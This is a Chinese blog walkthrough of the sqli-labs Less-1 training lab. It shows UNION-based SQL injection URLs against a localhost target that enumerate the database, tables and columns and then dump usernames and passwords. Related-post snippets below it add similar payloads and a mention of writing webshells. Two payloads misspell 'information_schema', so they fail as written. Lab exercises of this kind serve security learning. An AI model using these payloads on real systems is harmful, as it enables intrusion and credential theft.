SQL注入闯关第一关 - Less 1

最新推荐文章于 2024-01-30 11:43:46 发布
最新推荐文章于 2024-01-30 11:43:46 发布
阅读量465 收藏 5
点赞数 4
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78612169/article/details/135899216
版权

一、判断是注入点的类型

1、单引号测试

在id=1后面加上闭合符号 ' , 如果报错,则在后面加上--+将后面注释掉,如报不报错,则证明为字符型

http://127.0.0.1/sqlilabsphp7/Less-1/?id=1' -- +

二、判断字段数

order by 查询字段个数,逐级增加order by 后面的数字,直到报错。这里是order by到第4个字段时报错,所以证明有3个字段。

http://127.0.0.1/sqlilabsphp7/Less-1/?id=1 order by  4  -- +

三、使用联合查询  确定显示位置

http://127.0.0.1/sqlilabsphp7/Less-1/?id=1' union select 1,2,3  -- +

因为查询语句前面是正确的,所以显示前面的内容,后面的没有显示,所以跟该语句 使得前面错误显示后面的内容

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,2,3   -- +

四、查询数据库名

因为字段有三个字段所以 1 在这里只是为了占位置,version()版本号,database()库名

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,database(),version()   -- +

五、查询表名

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(table_name),3 from infromation_schema.tables where table_schema='security'  -- +

一共有以下表:

emails referers uagents users  很明显其中users是管理员的表

六、查询列名

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(column_name),3 from infromation_schema.columns where table_schema='security' and table_name='users'-- +

七、查询用户名以及密码

因为我们已经知道了表名,所以直接可以过滤,否则会找到很多很多其他表的数据影响浏览。

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password),3 from users  -- +

至此 获得了所有的用户名以及密码 ,注入成功。

文章至此结束,下无内容 ,谢谢浏览

小骆不吃辣(嘎嘎努力版)
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第一节 SQL注入的原理-01
09-15
SQL注入是一种常见的Web应用安全漏洞,发生在Web应用程序使用用户输入数据构造SQL语句时,没有正确地对用户输入进行过滤和转义,导致攻击者可以 inject 恶意SQL代码,访问、修改或控制敏感数据。 解释型语言和编译...
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
sqli-labs靶场Less-1极其详细练习过程
qq_51782199的博客
03-09 418
代表URL地址的结尾与数据参数的开端,后面的参数每一个数据参数以“名称=值”的形式出现,参数与参数之间利用一个连接符&来区分。id=1.3或者随便等于一个不存在的,id=99999或者id=-1等,这样做的目的是为了不显示前面所查询的内容,显示后面的内容。0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。order by 10 对要查询表的第10个字段(第10列)进行排序(升序),用于判断字段数(报错即为没有那么多字段)。
sqli-labs通教程(1)
洋洋的小黑屋
09-16 679
Less-1第一 打开网站 在url上加上?id=1’ 可以看到用户名和密码。 下面我们尝试开始注入。 探测是否存在注入点: 加单引号报错 加’ and 1=1报错 加’ and 1=1 --+正常 判断为字符型注入 一般可以使用联合表的方式来提取自己想要的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错...
sql注入第一
最新发布
weixin_70464248的博客
01-30 1130
使用共享存储方式: 在共享存储方式下,负载均衡器会将webshell文件存储在共享存储设备上,而不是存储在后端服务器上。这样,无论请求被转发到哪台服务器,都可以访问到相同的webshell文件,实现了连接的共享和一致性。nginx解析漏洞是指由于nginx的配置问题,导致nginx将以'.php'结尾的文件交给fastcgi处理,从而可能导致恶意用户上传包含PHP代码的文件并执行。需要注意的是,负载均衡下的webshell连接可能会面临一些挑战,比如文件分片上传导致文件被拆分到不同的后端服务器上。
SQL注入sqli第一详细讲解
m0_50818626的博客
05-23 1192
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
SQL注入第一-Less1
qq_54037445的博客
10-06 1869
SQL注入
SQL注入实验第一.docx
07-04
SQL注入实验,其中的实验数据库是基于MySQL数据库,针对常见的SQL注入语句的操作。
360天擎-前台sql注入1
08-03
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入she
SQL注入sqli-labs(less1-7)
冷冷的oO
04-24 3349
注:靶场基本上每一的目标都是拿到数据库的用户名和密码。 Less-1 打开第一看到如下页面,“Dhakkan”是印度俚语,意思是愚蠢的人,页面提示让我们输入ID值作为参数。
SQLi-Labs刷题记录】 Less1第一思路
gavinmao97的博客
07-21 475
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人的看法,如有不当之处,欢迎各位大佬及时批评指正! */ Less-1 GET-Error based-Single quotes-String 第一步,根据提示输入id参数 构造url:…/?id=1 显示正常,可以看见一组帐号和密码,不同的id可以看见不同的帐号和密码 第二步,尝试进行注入,在上一步url的基础上加入and 1=2,观察网站返回结果 构造url:…/?id=1 and 1=2 显示正常,表明and查
sqli-labs练习(第一)——字符型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1341
目录1、判断是数字型还是字符型2、通过报错判断闭合符3、确认查询的字段数量4、确认占位信息5、找库名6、查表名7、找表字段8、找用户名和密码 首先,进入靶场 1、判断是数字型还是字符型 在url后面分别添加?id=1, ?id=2, ?id=2-1 ,观察页面的变化,判断是字符型还是数字型。 (如果id=2-1 与 id=1的页面一样,就是数字型;如果id=2-1与id=2的页面一样,就是字符型) http://172.16.11.222/sqli-labs/Less-1/?id=1 发现它是字符型。
网络安全04-sql注入靶场第一
m0_68976043的博客
01-28 1947
sql注入环境,这个环境网上很多教程,其大部分基本都是小皮面板加漏洞环境放在WWW目录下,搜一下很容易就搭建出来了,这里就不详细讲述了,最后搭建下来的图片如图所示。
SQL注入第一
qq_73940312的博客
01-28 673
由之前的查询结果猜测users表大概率存有管理员账户及密码,所以使用id=-1' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema=database() -- + 可以查询到users表内的列名。再使用id=-1' union select 1,2,3 -- + 得知输出的数据对应的是第2和第3列。
sql-labs
m0_73189964的博客
06-09 328
sql前22靶场详解
sqli-liabs学习SQL注入之旅(第一~第十
guanjian_ci的博客
04-20 3911
第一 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
Sqli-labs Less-1 题解
Zhuoqian_1的博客
03-11 332
最近学习了SQL注入,找了Sqli-labs来练习一下。 Less-1 原页面: 1、题目中参数为id,尝试?id=1 2、尝试单引号注入?id=1' 发现单引号没有被过滤 这个提示为 ''1'' LIMIT 0,1' 注意这个地方是这样看的(按上述颜色,黄色的引号不是数据库查询里的,第一次没看懂QAQ) 3、尝试?id=1' # 这里有个坑,输入#不是把之后注释掉,要用%23 ,目前不知道原因,应该是版本问题。 ?id=1' %23 4、使用union s...
pikachu靶场sql注入
08-11
很抱歉,我无法提供有"Pikachu靶场SQL注入"的具体信息。请注意,在现实世界中进行未经授权的SQL注入攻击是非法行为,违反了计算机犯罪法律法规。我鼓励您遵守合法和道德的行为准则,以确保网络安全和个人隐私的保护。如果您对网络安全感兴趣,我可以提供一些相的学习资源或讨论一些合法的安全实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值